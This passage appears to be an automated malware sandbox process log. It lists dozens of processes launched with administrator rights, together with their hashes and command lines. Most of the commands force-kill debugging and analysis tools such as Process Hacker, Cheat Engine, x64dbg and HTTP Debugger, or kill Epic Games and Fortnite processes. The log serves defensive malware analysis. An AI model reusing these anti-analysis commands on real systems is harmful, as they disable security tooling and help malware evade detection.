                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:69
                                                                                                                                                                                                                                                                                    Start time:12:20:19
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:70
                                                                                                                                                                                                                                                                                    Start time:12:20:20
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:71
                                                                                                                                                                                                                                                                                    Start time:12:20:20
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:72
                                                                                                                                                                                                                                                                                    Start time:12:20:20
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:73
                                                                                                                                                                                                                                                                                    Start time:12:20:21
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0xac0000
                                                                                                                                                                                                                                                                                    File size:43'016 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:74
                                                                                                                                                                                                                                                                                    Start time:12:20:21
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:75
                                                                                                                                                                                                                                                                                    Start time:12:20:21
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:76
                                                                                                                                                                                                                                                                                    Start time:12:20:21
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im HTTPDebuggerUI.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:77
                                                                                                                                                                                                                                                                                    Start time:12:20:21
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:78
                                                                                                                                                                                                                                                                                    Start time:12:20:22
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:79
                                                                                                                                                                                                                                                                                    Start time:12:20:22
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:80
                                                                                                                                                                                                                                                                                    Start time:12:20:22
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:81
                                                                                                                                                                                                                                                                                    Start time:12:20:22
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im HTTPDebuggerSvc.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:82
                                                                                                                                                                                                                                                                                    Start time:12:20:23
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:83
                                                                                                                                                                                                                                                                                    Start time:12:20:23
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:84
                                                                                                                                                                                                                                                                                    Start time:12:20:23
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:sc stop HTTPDebuggerPro
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff672820000
                                                                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:85
                                                                                                                                                                                                                                                                                    Start time:12:20:23
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:86
                                                                                                                                                                                                                                                                                    Start time:12:20:24
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:87
                                                                                                                                                                                                                                                                                    Start time:12:20:24
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:88
                                                                                                                                                                                                                                                                                    Start time:12:20:24
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:89
                                                                                                                                                                                                                                                                                    Start time:12:20:24
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:90
                                                                                                                                                                                                                                                                                    Start time:12:20:25
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:91
                                                                                                                                                                                                                                                                                    Start time:12:20:25
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:92
                                                                                                                                                                                                                                                                                    Start time:12:20:25
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:93
                                                                                                                                                                                                                                                                                    Start time:12:20:25
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:94
                                                                                                                                                                                                                                                                                    Start time:12:20:26
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:95
                                                                                                                                                                                                                                                                                    Start time:12:20:26
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:96
                                                                                                                                                                                                                                                                                    Start time:12:20:26
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:97
                                                                                                                                                                                                                                                                                    Start time:12:20:26
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:98
                                                                                                                                                                                                                                                                                    Start time:12:20:26
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:99
                                                                                                                                                                                                                                                                                    Start time:12:20:26
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:100
                                                                                                                                                                                                                                                                                    Start time:12:20:26
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:101
                                                                                                                                                                                                                                                                                    Start time:12:20:26
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:103
                                                                                                                                                                                                                                                                                    Start time:12:20:27
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
